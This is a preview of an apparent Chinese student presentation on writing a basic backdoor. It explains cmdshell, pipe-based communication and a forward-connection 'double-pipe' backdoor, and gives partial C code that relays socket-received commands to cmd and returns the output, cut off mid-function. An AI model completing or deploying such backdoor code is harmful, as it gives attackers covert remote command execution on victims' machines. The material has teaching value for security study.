返回
基本的后门编写

基本的后门编写

ID:20366904

大小:254.69 KB

页数:9页

时间:2018-10-12

基本的后门编写_第1页
基本的后门编写_第2页
基本的后门编写_第3页
基本的后门编写_第4页
基本的后门编写_第5页
资源描述:

《基本的后门编写》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库

1、基本后门的编写网络工程0901张恺南2009266801251.1后门概述绕过安全性控制而获取对程序或系统访问权的方法。在软件的开发阶段,程序员常会在软件内创建后门以便可以修改程序中的缺陷。如果后门被其他人知道,或是在发布软件之前没有删除后门,那么它就成了安全风险。后门又称为BackDoor——一台计算机上有0到65535共65536个端口,那么如果把计算机看作是一间屋子,那么这65536个端口就可以把它看做是计算机为了与外界连接所开的65536扇门。1.2后门的发展功能上的发展原始的后门只有cmdshell功能,随着后门要

2、求的提高,功能也逐渐强大,添加了比如列举进程、结束进程等功能。在winshell之后,后门的功能越来越完善,开远程终端、克隆用户等功能都出现了。隐蔽性的发展在后门功能发展的同时,后门的生存能力也是不得不考虑的,一个后门如果不够隐蔽,那么很容易被管理员删除。隐蔽性分为自启动的隐蔽性、连接上的隐蔽性和进程上的隐蔽性。2.1简单cmdshell的实现什么是cmdshell?cmd就是系统中的cmd窗口,shell在英语中是“壳”的意思,cmdshell可以理解为是由被入侵系统返回的一个类似于cmd窗口的可以远程执行命令的模块。远程

3、主机12后门telnetcmd本地主机cmdshell有1和2两个不同的通信过程,要实现cmdshell,必须解决这两个通信问题。首先1过程是后门和cmd之间的通信,我们可以用管道通信技术来实现这个过程;2过程是跨越计算机的网络通信,我们可以用Winsock类库来实现。2.2.1管道通信技术什么是管道?管道是一种进程间,确切地说是线程间的通信方法。管道,正如这个名字所表示的,是一个有两个端口的对象,进程可以从这个对象的一个端口写入信息,并从这个对象的另一个端口读取信息。管道其实也是一个共享内存,但是这个共享内存更加规范,而且

4、有类似于队列的数据结构,不像内存映射文件那样仅仅是共享内存。2.2.2正向连接后门编程所谓正向连接后门,就是在被控制的计算机上监听一个端口,等待连接,当有连接后就启动后门功能,这又是最古老的后门。用winsock建立tcp服务端部分,用于等待本地连接建立连接后读取到的信息由winsock发送Winsock收到的信息写入管道利用管道句柄,调用WriteFile和ReadFile写入和读取管道中的信息调用CreateProcess函数建立cmd进程调用CreatePipe函数建立管道,返回管道句柄利用管道句柄把管道和触摸到的输入

5、输出关联起来2.2.2.1双管道后门所谓双管道后门,顾名思义也就是这个后门建立了两个管道。由于匿名管道是单向的,所以cmd的执行结果写入管道1的写句柄(hWritePipe),后门从管道1的读句柄(hReadFile)读取cmd的执行结果;后门把接收到的命令写入管道2的写句柄(hWriteFile),cmd通过管道2的读句柄(hReadPipe)读取命令执行。通过CreatePipe函数建立管道,建立两个线程,每个线程建立一个管道,线程1用于循环读取管道1中的数据,一旦读到数据,就发送给控制者;线程2用于循环接受数据,一旦接

6、受到数据就写入管道2中,由cmd来执行。具体代码如下://接受远程主机的命令,并写入管道2DWORDWINAPIThread2(LPVOIDlpParam){SECURITY_ATTRIBUTESsa;DWORDnByteToWrite,nByteWritten;charrecv_buff[1024];sa.nLength=sizeof(SECURITY_ATTRIBUTES);sa.lpSecurityDescriptor=NULL;sa.bInheritHandle=TRUE;//创建管道CreatePipe(&hRea

7、dPipe,&hWriteFile,&sa,0);while(true){Sleep(250);//接受远程cmd命令nByteToWrite=recv(sClient,recv_buff,1024,0);//写入管道WriteFile(hWriteFile,recv_buff,nByteToWrite,&nByteWritten,NULL);}return0;}//读取管道1中的数据,返回给远程主机DWORDWINAPIThread1(LPVOIDlpParam){SECURITY_ATTRIBUTESsa;DWORDle

8、n;charsend_buff[2048];sa.nLength=sizeof(SECURITY_ATTRIBUTES);sa.lpSecurityDescriptor=NULL;sa.bInheritHandle=TRUE;CreatePipe(&hReadFile,&hWritePip

当前文档最多预览五页,下载文档查看全文

此文档下载收益归作者所有

当前文档最多预览五页,下载文档查看全文
温馨提示:
1. 部分包含数学公式或PPT动画的文件,查看预览时可能会显示错乱或异常,文件下载后无此问题,请放心下载。
2. 本文档由用户上传,版权归属用户,天天文库负责整理代发布。如果您对本文档版权有争议请及时联系客服。
3. 下载前请仔细阅读文档内容,确认文档内容符合您的需求后进行下载,若出现内容与标题不符可向本站投诉处理。
4. 下载文档时可能由于网络波动等原因无法下载或下载错误,付费完成后未能成功下载的用户请联系客服处理。